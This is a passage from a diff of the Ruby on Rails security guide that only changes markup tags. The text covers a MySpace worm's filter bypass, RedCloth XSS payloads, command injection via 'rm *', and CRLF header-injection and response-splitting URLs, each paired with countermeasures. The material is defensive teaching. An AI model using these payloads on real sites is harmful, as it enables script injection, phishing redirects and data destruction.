+</plain> The next problem was MySpace filtering the word “javascript”, so the author used “java<NEWLINE>script" to get around this: -<pre> +<html> <div id="mycode" expr="alert('hah!')" style="background:url('java↵
script:eval(document.all.mycode.expr)')"> -</pre> +</html> Another problem for the worm's author were CSRF security tokens. Without them he couldn't send a friend request over POST. He got around it by sending a GET to the page right before adding a user and parsing the result for the CSRF token. @@ -839,24 +839,24 @@ h4. Textile Injection For example, RedCloth translates +_test_+ to <em>test<em>, which makes the text italic. However, up to the current version 3.0.4, it is still vulnerable to XSS. Get the "all-new version 4":http://www.redcloth.org that removed serious bugs. However, even that version has "some security bugs":http://www.rorsecurity.info/journal/2008/10/13/new-redcloth-security.html, so the countermeasures still apply. Here is an example for version 3.0.4: -<pre> ->> RedCloth.new('<script>alert(1)</script>').to_html -=> "<script>alert(1)</script>" -</pre> +<ruby> +RedCloth.new('<script>alert(1)</script>').to_html +# => "<script>alert(1)</script>" +</ruby> Use the :filter_html option to remove HTML which was not created by the Textile processor. -<pre> ->> RedCloth.new('<script>alert(1)</script>', [:filter_html]).to_html -=> "alert(1)" -</pre> +<ruby> +RedCloth.new('<script>alert(1)</script>', [:filter_html]).to_html +# => "alert(1)" +</ruby> However, this does not filter all HTML, a few tags will be left (by design), for example <a>: -<pre> ->> RedCloth.new("<a href='javascript:alert(1)'>hello</a>", [:filter_html]).to_html -=> "<p><a href="javascript:alert(1)">hello</a></p>" -</pre> +<ruby> +RedCloth.new("<a href='javascript:alert(1)'>hello</a>", [:filter_html]).to_html +# => "<p><a href="javascript:alert(1)">hello</a></p>" +</ruby> h5. Countermeasures @@ -882,10 +882,10 @@ If your application has to execute commands in the underlying operating system, A countermeasure is to _(highlight)use the +system(command, parameters)+ method which passes command line parameters safely_. -<pre> +<ruby> system("/bin/echo","hello; rm *") # prints "hello; rm *" and does not delete files -</pre> +</ruby> h4. Header Injection @@ -896,30 +896,30 @@ HTTP request headers have a Referer, User-Agent (client software), and Cookie fi Besides that, it is _(highlight)important to know what you are doing when building response headers partly based on user input._ For example you want to redirect the user back to a specific page. To do that you introduced a “referer“ field in a form to redirect to the given address: -<pre> +<ruby> redirect_to params[:referer] -</pre> +</ruby> What happens is that Rails puts the string into the Location header field and sends a 302 (redirect) status to the browser. The first thing a malicious user would do, is this: -<pre> +<plain> http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld -</pre> +</plain> And due to a bug in (Ruby and) Rails up to version 2.1.2 (excluding it), a hacker may inject arbitrary header fields; for example like this: -<pre> +<plain> http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld%0d%0aX-Header:+Hi! http://www.yourapplication.com/controller/action?referer=path/at/your/app%0d%0aLocation:+http://www.malicious.tld -</pre> +</plain> Note that "%0d%0a" is URL-encoded for "\r\n" which is a carriage-return and line-feed (CRLF) in Ruby. So the resulting HTTP header for the second example will be the following because the second Location header field overwrites the first. -<pre> +<plain> HTTP/1.1 302 Moved Temporarily (...) Location: http://www.malicious.tld -</pre> +</plain> So _(highlight)attack vectors for Header Injection are based on the injection of CRLF characters in a header field._ And what could an attacker do with a false redirection? He could redirect to a phishing site that looks the same as yours, but asks to login again (and sends the login credentials to the attacker). Or he could install malicious software through browser security holes on that site. Rails 2.1.2 escapes these characters for the Location field in the +redirect_to+ method. _(highlight)Make sure you do it yourself when you build other header fields with user input._ @@ -927,7 +927,7 @@ h5. Response Splitting If Header Injection was possible, Response Splitting might be, too. In HTTP, the header block is followed by two CRLFs and the actual data (usually HTML). The idea of Response Splitting is to inject two CRLFs into a header field, followed by another response with malicious HTML. The response will be: -<pre> +<plain> HTTP/1.1 302 Found [First standard 302 response] Date: Tue, 12 Apr 2005 22:09:07 GMT Location:
Content-Type: text/html @@ -942,7 +942,7 @@ Keep-Alive: timeout=15, max=100 shown as the redirected page] Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html -</pre> +</plain> Under certain circumstances this would present the malicious HTML to the victim. However, this seems to work with Keep-Alive connections, only (and many browsers are using one-time connections). But you can't rely on this. _(highlight)In any case this is a serious bug, and you should update your Rails to version 2.0.5 or 2.1.2 to eliminate Header Injection (and thus response splitting) risks._ |